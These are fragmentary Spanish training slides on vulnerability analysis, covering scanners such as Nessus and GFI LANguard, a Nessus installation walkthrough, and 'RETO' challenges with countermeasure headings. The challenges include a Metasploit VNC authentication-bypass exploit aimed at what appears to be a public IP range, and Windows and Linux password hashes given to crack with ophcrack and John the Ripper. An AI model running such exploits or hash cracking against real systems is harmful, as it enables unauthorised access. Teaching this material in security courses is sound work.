Capitulo 3. Analista de Sistemas
Capitulo 3. Analista de Sistemas
Capitulo 3. Analista de Sistemas
Organiza
Fallos de
seguridad
Información de los
equipos
Estructura empresa
Equipos activos
•Windows
•MBSA (Microsoft Baseline Security Analizer)
•GFILanguard
•Windows / Linux
•Retina Network Security Scanner
•Shadow Security Scanner
•Nessus
Webs
www.webzscan.com
www.cert.org
Webs
www.packetstormsecurity.org
www.milw0rm.com
Webs
secunia.com
GFI LANGuard
GFI LANGuard
/Backtrack/Vulnerability Identification/Security Scanner
/GFI LanGuard
Nessus
Ventaja: El mejor
Nessus - instalació
instalación
Nessus
sh nessus-installer-2[1].2.4.sh
Aceptar todas las confirmaciones
Código de activación para las plugins (www.nessus.org/plugins)
0FC2-7D96-A960-C9A5-8237
Nessus - instalació
instalación
Crear un certificado nessus-mkcert
Nessus - instalació
instalación
Crear un usuario nessus-adduser
pepe // nombre del usuario
pass // tipo de autentificación
hola00 // contraseña
Ctrl+D
yes
Nessus - instalació
instalación
Ejecutar daemon nessusd
nmap localhost
Nessus - instalació
instalación
Ejecutar cliente en windows nessuswx
Comunications,
Connect
Nessus - instalació
instalación
Activo los
plugins
Nessus - instalació
instalación
Nessus - instalació
instalación
RETO
CONTRAMEDIDAS
Iniciar backtrack
Crear una consola
cd /pentest/scanners
cd vnc
80.58.32.0/24
use realvnc_41_bypass
show options
exploit
http://localhost:55555
Buscar vulnerabilidades
/Backtrack/Vulnerability Identification/Security Scanner/MS03-026
Lanzador automá
automático - ninja
/Backtrack/Penetration/Metasploit/Ninja
RETO
CONTRAMEDIDAS
Administrador:500:BCE739534EA4E445AAD3B435B51404EE:
616820449E071DF5D1C893BA19CA6772:::
Usuario
LANMAN
NTLM
rtsort lm_numeric#.....rt
ophcrack
ophcrack
Si desea pasar la imagen ISO a
una unidad USB debe realizar
los siguientes pasos:
• Descarga la última imagen ISO
• Descarga e instala MySlax Creator
• Ejecuta MySlax Creator
• En la pantalla de selección de origen
(Select Source): selecciona iso-
default, luego busca la imagen ISO
en tu disco, haz click en "mount" y
luego haz click en la unidad USB.
• En la pantalla siguiente: selecciona
tu unidad USB, haz click en "create
RETO
CONTRAMEDIDAS
CONTRAMEDIDAS
CONTRAMEDIDAS
root:$1$iUVR5Rl1$3ophMWtv4HMIxLic0ya3x.:0:0:root:/root:/
bin/bash
Contraseña cifrada
John the
ripper
@stack LC5
RETO
root:$1$iUVR5Rl1$3ophMWtv4HMIxLic0ya3x.:0:0:root:/root:/bin/bash
usuario:$1$ZV/w3LrM$La0AN9rgtvl5H9EaYUuAd/:500:500::/home/usuario:/bin/bash
pepe:$1$M87MxBA1$Hnvd4rWXHzUpaMr.zIHHZ1:501:501::/home/pepe:/bin/bash
maria:$1$OpmRAkMW$fFOXw7XXupkyCxOK01EXC/:502:502::/home/maria:/bin/bash
ana:$1$WJTYRSbL$I5KBulpXS2jfde6FyopzJ1:504:504::/home/ana:/bin/bash
CONTRAMEDIDAS